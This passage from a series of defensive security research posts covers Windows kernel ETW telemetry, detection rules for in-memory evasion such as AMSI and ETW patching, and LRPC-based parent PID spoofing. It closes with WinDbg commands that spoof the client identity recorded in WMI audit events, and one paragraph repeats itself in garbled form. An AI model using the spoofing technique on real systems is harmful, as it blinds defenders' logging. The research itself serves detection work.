Finally, on modern CPUs there are also numerous execution trace mechanisms that can be used to detect stack spoofing - such as Intel LBR, Intel BTS, Intel AET, Intel IPT, x64 CET and x64 Architectural LBR. Elastic already takes advantage of some of these hardware features, we have suggested to Microsoft that they may also wish to do so in further scenarios outside of exploit protection, and we are investigating further enhancements ourselves. Stay tuned.

Conclusion

Execution Modality is a new lens through which we can seek to understand attacker tradecraft.

Detecting specific techniques for individual modalities is not a cost-effective approach though - there are simply too many techniques and too many modalities. Instead, we should focus our technique detections as close to the operating system source of truth as possible; being careful not to lose necessary activity context, or to introduce unmanageable false positives. This is why Elastic considers Kernel ETW to be superior to user-mode ntdll hooking - it is closer to the source of truth allowing more robust detections.

For modality-based detection approaches, the value becomes apparent when we baseline all expected low-level telemetry for a given modality - and trigger on any deviations.

Historically, attackers have been able to choose modality for convenience. It is more cost effective to write tools in C# or PowerShell than in C or assembly. If we can herd modality then we’ve imposed cost.

Kernel ETW is the best ETW

Fri, 13 Sep 2024 00:00:00 GMT

Preamble

A critical feature of secure-by-design software is the generation of audit logs when privileged operations are performed. These native audit logs can include details of the internal software state, which are impractical for third-party security vendors to bolt on after the fact.

Most Windows components generate logs using Event Tracing for Windows (ETW). These events expose some of Windows's inner workings, and there are scenarios when endpoint security products benefit from subscribing to them. For security purposes, though, not all ETW providers are created equal.

The first consideration is typically the reliability of the event provider itself - in particular, where the logging happens. Is it within the client process and trivially vulnerable to ETW tampering? Or is it perhaps slightly safer over in an RPC server process? Ideally, though, the telemetry will come from the kernel. Given the user-to-kernel security boundary, this provides stronger anti-tamper guarantees over in-process telemetry. This is Microsoft’s recommended approach. Like Elastic Endpoint, Microsoft Defender for Endpoint also uses kernel ETW in preference to fragile user-mode ntdll hooks.

For example, an adversary might be able to easily avoid an in-process user-mode hook on ntdll!NtProtectVirtualMemory, but bypassing a kernel PROTECTVM ETW event is significantly harder. Or, at least, it should be.

The Security Event Log is effectively just persistent storage for the events from the Microsoft-Windows-Security-Auditing ETW provider. Surprisingly, Security Event 4688 for process creation is not a kernel event. The kernel dispatches the data to the Local Security Authority (lsass.exe) service, emitting an ETW event for the Event Log to consume. So, the data could be tampered with from within that server process. Contrast this with the ProcessStart event from the Microsoft-Windows-Kernel-Process provider, which is logged directly by the kernel and requires kernel-level privileges to interfere with.

The second consideration is then the reliability of the information being logged. You might trust the event source, but what if it is just blindly logging client-supplied data that is extrinsic to the event being logged?

In this article, we’ll focus on kernel ETW events. These are typically the most security-relevant because they are difficult to bypass and often pertain to privileged actions being performed on behalf of a client thread.

When Microsoft introduced Kernel Patch Protection, security vendors were significantly constrained in their ability to monitor the kernel. Given the limited number of kernel extension points provided by Microsoft, they were increasingly compelled to rely on asynchronous ETW events for after-the-fact visibility of kernel actions performed on behalf of malware.

Given this dependency, the public documentation of Windows kernel telemetry sources is unfortunately somewhat sparse.

Kernel ETW Events

There are currently four types of ETW providers that we need to consider.

Firstly, there are legacy and modern variants of “event provider”:

legacy (mof-based) event providers
modern (manifest-based) event providers

And then there are legacy and modern variants of “trace provider”:

legacy Windows software trace preprocessor (WPP) trace providers
modern TraceLogging trace providers

The “event” versus “trace” distinction is mostly semantic. Event providers are typically registered with the operating system ahead of time, and you can inspect the available telemetry metadata. These are typically used by system administrators for troubleshooting purposes and are often semi-documented. But when something goes really, really wrong there are (hidden) trace providers. These are typically used only by the original software authors for advanced troubleshooting and are undocumented.

In practice, each uses a slightly different format file to describe and register its events and this introduces minor differences in how the events are logged - and, more importantly, how the potential events can be enumerated.

Modern Kernel Event Providers

The modern kernel ETW providers aren’t strictly documented. However, registered event details can be queried from the operating system via the Trace Data Helper API. Microsoft’s PerfView tool uses these APIs to reconstruct the provider’s registration manifest, and Pavel Yosifovich’s EtwExplorer then wraps these manifests in a simple GUI. You can use these tab-separated value files of registered manifests from successive Windows versions. A single line per event is very useful for grepping, though others have since published the raw XML manifests.

These aren’t all of the possible Windows ETW events, however. They are only the ones registered with the operating system by default. For example, the ETW events for many server roles aren’t registered until that feature is enabled.

Legacy Kernel Event Providers

The legacy kernel events are documented by Microsoft. Mostly.

Legacy providers also exist within the operating system as WMI EventTrace classes. Providers are the root classes, groups are the children, and events are the grandchildren.

To search the legacy events in the same way as modern eventTo search legacy events in the same way as modern events, these classes were parsed, and the original MOF (mostly) reconstructed. This MOF support was added to EtwExplorer, and tab-separated value summaries of the legacy events were these classes were parsed and the original MOF (mostly) reconstructed. This MOF support was added to EtwExplorer and tab-separated value summaries of the legacy events published.

The fully reconstructed Windows Kernel Trace MOF is here (or in a tabular format here).

Of the 340 registered legacy events, only 116 were documented. Typically, each legacy event needs to be enabled via a specific flag, but these weren’t documented either. There was a clue in the documentation for the kernel Object Manager Trace events. It mentioned PERF_OB_HANDLE, a constant that is not defined in the headers in the latest SDK. Luckily, Geoff Chappell and the Windows 10 1511 WDK came to the rescue. This information was used to add support for PERFINFO_GROUPMASK kernel trace flags to Microsoft’s KrabsETW library. It also turned out that the Object Trace documentation was wrong. That non-public constant can only be used with an undocumented API extension. Fortunately, public Microsoft projects such as PerfView often provide examples of how to use undocumented APIs.

With both manifests and MOFs published on GitHub, most kernel events can now be found with this query.

Interestingly, Microsoft often obfuscates the names of security-relevant events, so searching for events with a generic name prefix such as task_ yields some interesting results.

Sometimes the keyword hints to the event’s purpose. For example, task_014 in Microsoft-Windows-Kernel-General is enabled with the keyword KERNEL_GENERAL_SECURITY_ACCESSCHECK.

And thankfully, the parameters are almost always well-named. We might guess that task_05 in Microsoft-Windows-Kernel-Audit-API-Calls is related to OpenProcess since it logs fields named TargetProcessId and DesiredAccess.

Another useful query is to search for events with an explicit ProcessStartKey field. ETW events can be configured to include this field for the logging process, and any event that includes this information for another process is often security relevant.

If you had a specific API in mind, you might query for its name or its parameters. For example, if you want Named Pipe events, you might use this query.

In this instance, though, Microsoft-Windows-SEC belongs to the built-in Microsoft Security drivers that Microsoft Defender for Endpoint (MDE) utilizes. This provider is only officially available to MDE, though Sebastian Feldmann and Philipp Schmied have demonstrated how to start a session using an AutoLogger and subscribe to that session’s events. This is only currently useful for MDE users as otherwise, the driver is not configured to emit events.

But what about trace providers?

Modern Kernel Trace Providers

TraceLogging metadata is stored as an opaque blob within the logging binary. Thankfully this format has been reversed by Matt Graeber. We can use Matt’s script to dump all TraceLogging metadata for ntoskrnl.exe. A sample dump of Windows 11 TraceLogging metadata is here.

Unfortunately, the metadata structure alone doesn’t retain the correlation between providers and events. There are interesting provider names, such as Microsoft.Windows.Kernel.Security and AttackSurfaceMonitor, but it’s not yet clear from our metadata dump which events belong to these providers.

Legacy Kernel Trace Providers

WPP metadata is stored within symbols files (PDBs). Microsoft includes this information in the public symbols for some, but not all, drivers. The kernel itself, however, does not produce any WPP events. Instead, the legacy Windows Kernel Trace event provider can be passed undocumented flags to enable the legacy “trace” events usually only available to Microsoft kernel developers.

Provider	Documentation	Event Metadata
Modern Event Providers	None	Registered XML manifests
Legacy Event Providers	Partial	EventTrace WMI objects
Modern Trace Providers	None	Undocumented blob in binary
Legacy Trace Providers	None	Undocumented blob in Symbols

Next Steps

We now have kernel event metadata for each of the four flavours of ETW provider, but a list of ETW events is just our starting point. Knowing the provider and event keyword may not be enough to generate the events we expect. Sometimes, an additional configuration registry key or API call is required. More often, though, we just need to understand the exact conditions under which the event is logged.

Knowing exactly where and what is being logged is critical to truly understanding your telemetry and its limitations. And, thanks to decompilers becoming readily available, we have the option of some just-enough-reversing available to us. In IDA we call this “press F5”. Ghidra is the open-source alternative and it supports scripting … with Java.

For kernel ETW, we are particularly interested in EtwWrite calls that are reachable from system calls. We want as much of the call site parameter information as possible, including any associated public symbol information. This meant that we needed to walk the call graph but also attempt to resolve the possible values for particular parameters.

The necessary parameters were the RegHandle and the EventDescriptor. The former is an opaque handle for the provider, and the latter provides event-specific information, such as the event id and its associated keywords. An ETW keyword is an identifier used to enable a set of events.

Even better, these event descriptors were typically stored in a global constant with a public symbol.

We had sufficient event metadata but still needed to resolve the opaque provider handle assigned at runtime back to the metadata about the provider. For this, we also needed the EtwRegister calls.

The typical pattern for kernel modern event providers was to store the constant provider GUID and the runtime handle in globals with public symbols.

Another pattern encountered was calls to EtwRegister, EtwEwrite, and EtwUnregister, all in the same function. In this case, we took advantage of the locality to find the provider GUID for the event.

Modern TraceLogging providers, however, did not have associated per-provider public symbols to provide a hint of each provider’s purpose. However, Matt Graeber had reversed the TraceLogging metadata format and documented that the provider name is stored at a fixed offset from the provider GUID. Having the exact provider name is even better than just the public symbol we recovered for modern events.

This just left the legacy providers. They didn’t seem to have either public symbols or metadata blobs. Some constants are passed to an undocumented function named EtwTraceKernelEvent which wraps the eventual ETW write call.

Those constants are present in the Windows 10 1511 WDK headers (and the System Informer headers), so we could label these events with the constant names.

This script has been recently updated for Ghidra 11, along with improved support for TraceLogging and Legacy events. You can now find it on GitHub here - https://github.com/jdu2600/API-To-ETW

Sample output for the Windows 11 kernel is here.

Our previously anonymous Microsoft-Windows-Kernel-Audit-API-Calls events are quickly unmasked by this script.

Id	EVENT_DESCRIPTOR Symbol	Function
1	KERNEL_AUDIT_API_PSSETLOADIMAGENOTIFYROUTINE	PsSetLoadImageNotifyRoutineEx
2	KERNEL_AUDIT_API_TERMINATEPROCESS	NtTerminateProcess
3	KERNEL_AUDIT_API_CREATESYMBOLICLINKOBJECT	ObCreateSymbolicLink
4	KERNEL_AUDIT_API_SETCONTEXTTHREAD	NtSetContextThread
5	KERNEL_AUDIT_API_OPENPROCESS	PsOpenProcess
6	KERNEL_AUDIT_API_OPENTHREAD	PsOpenThread
7	KERNEL_AUDIT_API_IOREGISTERLASTCHANCESHUTDOWNNOTIFICATION	IoRegisterLastChanceShutdownNotification
8	KERNEL_AUDIT_API_IOREGISTERSHUTDOWNNOTIFICATION	IoRegisterShutdownNotification

Symbol and containing function for Microsoft-Windows-Kernel-Audit-API-Calls events

With the call path and parameter information recovered by the script, we can also see that the SECURITY_ACCESSCHECK event from earlier is associated with the SeAccessCheck kernel API, but only logged within a function named SeLogAccessFailure. Only logging failure conditions is a very common occurrence with ETW events. For troubleshooting purposes, the original ETW use case, these are typically the most useful and the implementation in most components reflects this. Unfortunately, for security purposes, the inverse is often true. The successful operation logs are usually more useful for finding malicious activity. So, the value of some of these legacy events is often low.

Modern Secure by Design practice is to audit log both success and failure for security relevant activities and Microsoft continues to add new security-relevant ETW events that do this. For example, the preview build of Windows 11 24H2 includes some interesting new ETW events in the Microsoft-Windows-Threat-Intelligence provider. Hopefully, these will be documented for security vendors ahead of its release.

Running this decompiler script across interesting Windows drivers and service DLLs is left as an exercise to the reader.

Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks

Tue, 09 Jan 2024 00:00:00 GMT

Introduction

We were pleased to see that the kernel call stack capability we released in 8.8 was met with extremely positive community feedback - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional context.

But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows(ETW) provider.

Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is inherently fragile. At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some systemic issues that we have logged with Microsoft, along with suggested mitigations.

Implementation

Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don't want you to miss the critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.

However, this approach proved insufficient in reducing API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blindspot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.

Currently, we propagate visibility into the following APIs -

VirtualAlloc
VirtualProtect
MapViewOfFile
VirtualAllocEx
VirtualProtectEx
MapViewOfFile2
QueueUserAPC [call stacks not always available due to ETW limitations]
SetThreadContext [call stacks planned for 8.12]
WriteProcessMemory
ReadProcessMemory (lsass) [planned for 8.12]

In addition to call stack information, our API events are also enriched with several behaviors:

API event	Description
`cross-process`	The observed activity was between two processes.
`native_api`	A call was made directly to the undocumented Native API rather than the supported Win32 API.
`direct_syscall`	A syscall instruction originated outside of the Native API layer.
`proxy_call`	The call stack appears to show a proxied API call to masking the true caller.
`sensitive_api`	Executable non-image memory is unexpectedly calling a sensitive API.
`shellcode`	Suspicious executable non-image memory is calling a sensitive API.
`image-hooked`	An entry in the call stack appears to have been hooked.
`image_indirect_call`	An entry in the call stack was preceded by a call to a dynamically resolved function.
`image_rop`	An entry in the call stack was not preceded by a call instruction.
`image_rwx`	An entry in the call stack is writable.
`unbacked_rwx`	An entry in the call stack is non-image and writable.
`allocate_shellcode`	A region of non-image executable memory suspiciously allocated more executable memory.
`execute_fluctuation`	The PAGE_EXECUTE protection is unexpectedly fluctuating.
`write_fluctuation`	The PAGE_WRITE protection of executable memory is unexpectedly fluctuating.
`hook_api`	A change to the memory protection of a small executable image memory region was made.
`hollow_image`	A change to the memory protection of a large executable image memory region was made.
`hook_unbacked`	A change to the memory protection of a small executable non-image memory was made.
`hollow_unbacked`	A change to the memory protection of a large executable non-image memory was made.
`guarded_code`	Executable memory was unexpectedly marked as PAGE_GUARD.
`hidden_code`	Executable memory was unexpectedly marked as PAGE_NOACCESS.
`execute_shellcode`	A region of non-image executable memory was executed in an unexpected fashion.
`hardware_breakpoint_set`	A hardware breakpoint was potentially set.

New Rules

In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.

These rules include:

Windows API Call via Direct Syscall

Identifies the call of commonly abused Windows APIs to perform code injection and where the call stack is not starting with NTDLL:

api where event.category == "intrusion_detection" and

    process.Ext.api.behaviors == "direct_syscall" and 

    process.Ext.api.name : ("VirtualAlloc*", "VirtualProtect*", 
                             "MapViewOfFile*", "WriteProcessMemory")

VirtualProtect via Random Indirect Syscall

Identifies calls to the VirtualProtect API and where the call stack is not originating from its equivalent NT syscall NtProtectVirtualMemory:

api where 

 process.Ext.api.name : "VirtualProtect*" and 

 not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: ("*ntdll.dll!NtProtectVirtualMemory*", "*ntdll.dll!ZwProtectVirtualMemory*"))

Image Hollow from Unbacked Memory

api where process.Ext.api.behaviors == "hollow_image" and 

  process.Ext.api.name : "VirtualProtect*" and 

  process.Ext.api.summary : "*.dll*" and 

  process.Ext.api.parameters.size >= 10000 and process.executable != null and 

  process.thread.Ext.call_stack_summary : "*Unbacked*"

Below example of matches on wwanmm.dll module stomping to replace it’s memory content with a malicious payload:

AMSI and WLDP Memory Patching

Identifies attempts to modify the permissions or write to Microsoft Antimalware Scan Interface or the Windows Lock Down Policy related DLLs from memory to modify its behavior for evading malicious content checks:

api where

 (
  (process.Ext.api.name : "VirtualProtect*" and 
    process.Ext.api.parameters.protection : "*W*") or

  process.Ext.api.name : "WriteProcessMemory*"
  ) and

 process.Ext.api.summary : ("* amsi.dll*", "* mpoav.dll*", "* wldp.dll*")

Evasion via Event Tracing for Windows Patching

Identifies attempts to patch the Microsoft Event Tracing for Windows via memory modification:

api where process.Ext.api.name :  "WriteProcessMemory*" and 

process.Ext.api.summary : ("*ntdll.dll!Etw*", "*ntdll.dll!NtTrace*") and 

not process.executable : ("?:\\Windows\\System32\\lsass.exe", "\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe")

Windows System Module Remote Hooking

Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:

api where process.Ext.api.name : "WriteProcessMemory" and  

process.Ext.api.behaviors == "cross-process" and 

process.Ext.api.summary : ("*ntdll.dll*", "*kernelbase.dll*")

Below is an example of matches on ThreadLessInject, a new process injection technique that involves hooking an export function from a remote process to gain shellcode execution (avoiding the creation of a remote thread):

Conclusion

Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and optionally directly into their hands without any hidden filtering assumptions.

Stay tuned for the call stack features in upcoming releases of Elastic Security.

Resources

Rules released with 8.11:

Effective Parenting - detecting LRPC-based parent PID spoofing

Wed, 29 Mar 2023 00:00:00 GMT

Adversaries currently utilize RPC’s client-server architecture to obfuscate their activities on a host – including COM and WMI which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.

The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a ShellExecute interface and also the WMI Win32\_Process::Create method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call over an RPC call to spawn PowerShell elsewhere on the system.

The defender is left with a challenge to interpretation because of this lack of context - Word spawning PowerShell is a red flag, but is Explorer spawning PowerShell malicious, or simply user behavior?

RPC will typically use LRPC as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.

A Brief History of Child Process Evasion

It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.

However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect suspicious MS Office child processes and Elastic Endpoint will also prevent malicious execution. As documented in the Elastic Global Threat Report, suspicious parent/child relationships was one of the three most common defense evasion techniques used by threats in 2022.

Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.

Adversaries initially pivoted to evasions using a Win32 API feature introduced in Windows Vista to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, endpoint security could still identify the real parent process based on the calling process context during the process creation notification callback, and detection rule coverage was quickly re-established.

New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including DCOM and WMI which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).

The most well-known of these was the Win32\_Process::Create WMI method. In order to detect this, Microsoft appears to have explicitly added a new Microsoft-Windows-WMI-Activity ETW event in Windows 10 1809. The new event 23 included the client process id - the missing data point needed to associate the activity with a requesting client.

Unfortunately adversaries were quickly able to pivot to alternate process spawning out-of-process RPC servers such as MMC20.Application::ExecuteShellCommand. Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers one-by-one wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.

Detecting LRPC provenance

The majority of previous public RPC telemetry research has focused on inter-host lateral movement – typically spawning a process on a remote host. For example: - Lateral Movement using the MMC20.Application COM Object- Lateral Movement via DCOM: Round 2- Endpoint Detection of Remote Service Creation and PsExec - Utilizing RPC Telemetry- Detecting Lateral Movement techniques with Elastic - Stopping Lateral Movement via the RPC Firewall

The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with RPC Filters (part of the Windows Filtering Platform) or specific RPC methods with 3rd party tooling like RPC Firewall.

Unfortunately these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically ALPC - monitoring and filtering at the network layer does not then apply.

On the host, detection engineers typically look to leverage telemetry from the inbuilt Event Tracing (including EventLog) in the first instance. If this proves insufficient, then they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.

In the RPC case, Microsoft-Windows-RPC ETW events are very useful for identifying anomalous behaviours.

Especially: - Event 5 - RpcClientCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel) - Event 6 - RpcServerCallStart (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)

Additionally, RpcClientCallStart is generated by the client and RpcServerCallStart by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the RpcClientCallStart event.

The RPC interface UUID and Procedure number combined with the caller details are (usually) sufficient to identify intent. For example, RPC interface UUID {367ABB81–9844–35F1-AD32–98F038001003} is the Service Control Manager Remote Protocol which exposes the ability to configure Windows services. The 12th procedure in this interface is RCreateServiceW which notoriously is the method that PsExec uses to execute processes on remote systems.

For endpoint security vendors, however, there are a few issues to address before scalable robust Microsoft-Windows-RPC detections would be possible: 1. RPC event volumes are significant 2. There isn't an obvious mechanism to strongly correlate a client call with the resultant server call 3. There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior

Let’s address these three issues one by one.

LRPC event volumes

There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.

Correlating RPC server calls with their clients

Modern Windows RPC has roughly three transports: - TCP/IP (nacn_ip_tcp, nacn_http, ncadg_ip_udp and nacn_np over SMB) - inter-process Named Pipes (direct nacn_np) - inter-process ALPC (ncalrpc)

The RpcServerCallStart event alone is not sufficient to determine if the call was inter-process. It needs to be correlated against a preceding RpcCientCallStart event, and this correlation is unfortunately weak. At best you can identify a pair of RpcServerCall start/stop events that are bracketed by a pair of RpcClientCall events with the same parameters. (Note - for performance reasons, ETW events generated from different threads may arrive out of order). This means that you need to maintain a holistic RPC state - which creates an on-host storage and processing volume concern in order to address the event volume concern.

More importantly though, the RpcClientCallStart events are generated in the client process where an adversary has already achieved execution and therefore can be intercepted with very little effort. There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.

Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information - which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store RPC State Information which can then be used during debugging to identify the client caller from the server thread. Unfortunately the Windows XP era documentation didn’t immediately work for Windows 10.

It did provide a rough outline describing how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how RPC Firewallhandles network RPC - just with local endpoints).

Correlating RPC server calls and resultant behavior

The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the ExecuteShellCommand method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like IDispatch::Invoke?

We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.

Introducing ETW’s ActivityId

Thankfully, Microsoft had already thought of this scenario and provides ETW tracing guidance to developers.

They suggest that developers generate and propagate a unique 128-bit ActivityId between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread as the value is stored in thread local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!

It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to EventRegister calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.

These GUIDs correspond to Microsoft-Windows-RPC, Microsoft-Windows-Networking-Correlation and Microsoft-Windows-RPC-Events respectively. Further, the RPC runtime helpfully wraps calls to EventWrite in just two places.

The first call is in McGenEventWrite\_EtwEventWriteTransfer and looks like this:

`EtwEventWriteTransfer` (RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);

The NULL parameters mean that ActivityId will always be the configured per-thread ActivityId and RelatedActivityId will always be excluded in events logged by this code path.

The second call is in EtwEx\_tidActivityInfoTransfer and looks like this:

`EtwEventWriteTransfer` (Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);

This means that RelatedActivityId will only ever be logged in Microsoft-Windows-Networking-Correlation events. RPC Runtime ActivityId s are (predominantly) created within a helper function that ensures that this correlation is always logged.

Decompilation also revealed that the RPC runtime allocates ETW ActivityId s by calling UuidCreate , which generates a random 128-bit value. This is done in locations such as NdrAysncClientCall and HandleRequest. In other words, the client and server both individually allocate ActivityId s. This isn’t unsurprising because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct which would allow the client to propagate an ActivityId to the server. That’s okay though: we’re only currently missing the correlation between server call and the resultant behaviour. Also we don’t want to trust any potentially tainted client-supplied information.

So now we know exactly how RPC intends to correlate activities triggered by RPC calls- by setting the per-thread ETW ActivityId and by logging RPC ActivityId correlations to Microsoft-Windows-Networking-Correlation. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the ActivityId appropriately.

We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.

Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The ActivityId is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s RPC scalability advice) then the causality correlation is implicitly broken.

Further, kernel ETW events seem to universally log an ActivityId of {00000000-0000-0000-0000-000000000000} – even when the thread has a (user-mode) ActivityId configured. It is likely that the kernel implementation of EtwWriteEvent simply does not query the ActivityId which is stored in user-mode thread local storage.

This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.

A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the Microsoft.Windows.ShellExecute TraceLogging provider looked interesting). What would Microsoft do?

What would Microsoft do?

More specifically, how does Microsoft populate the ClientProcessId in the Microsoft-Windows-WMI-Activity ETW event 23 (aka Win32\_Process::Create )?

`task_023` (UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)

Unlike RPC, WMI natively supports end-to-end tracing via a CorrelationId which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.

But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?

We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the Sealighter tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.

In this case, the event was actually being written by ntdll!EtwEventWrite in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).

Putting a breakpoint on PublishWin32ProcessCreation , we see via parameter value inspection that the ClientProcessId is passed (on the stack) as the 10th parameter. We can then look at InspectWin32ProcessCreateExecution to determine how the value that is passed in is determined.

A roughly tidied Ghidra decompilation of InspectWin32ProcessCreateExecution might resemble this:

We can see that the client process id comes from the CWbemNamespace object. Searching for reference to this structure field, we find that it is only set in CWbemNamespace::Initialize. Our earlier stack trace started in wbemcore!CCoreQueue and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.

We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the WMI Protocol Initialization that explained much of this and might have saved a little time.

We took the first approach. The second parameter to InspectWin32ProcessCreateExecution is an IWbemContext – which allows the caller to provide additional information to providers. This is how the parameters to Win32\_Process::Create are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?

IWbemLevel1Login::NTLMLogin stood out in the call traces as a good place to start looking.

And right next to its COM interface UUID was IWbemLoginClientID[Ex] which had a very interesting SetClientInfo call, which was documented on MSDN:

The WMI client calls wbemprox!SetClientIdentity which looks roughly like this:

IWbemLoginClientIDEx is currently undocumented, but we can infer the parameters from the values passed.

At this point, it looks like the client process is passing ClientMachineName , ClientMachineFQDN , ClientProcessId and ClientProcessCreationTime to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.

Using WinDbg, we set up a couple quick patches to the WMI client process and then spawned a process via WMI:

windbg> bp wbemprox!SetClientIdentity+0xff "eu @rdx \"SPOOFED....\"; gc"
windbg> bp wbemprox!SetClientIdentity+0x1c4 "r r9=0n1337; eu @r8 \"SPOOFED.COM\"; gc"
